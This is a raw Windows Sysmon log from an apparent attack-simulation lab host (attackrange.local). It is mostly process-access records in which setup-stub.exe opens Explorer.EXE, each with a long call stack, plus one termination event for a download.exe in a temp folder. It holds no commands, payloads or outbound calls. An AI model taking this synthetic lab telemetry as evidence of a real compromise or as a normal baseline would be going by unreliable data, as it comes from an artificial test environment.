13:59:54.474{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 534500x800000000000000016649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe 10341000x800000000000000016648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
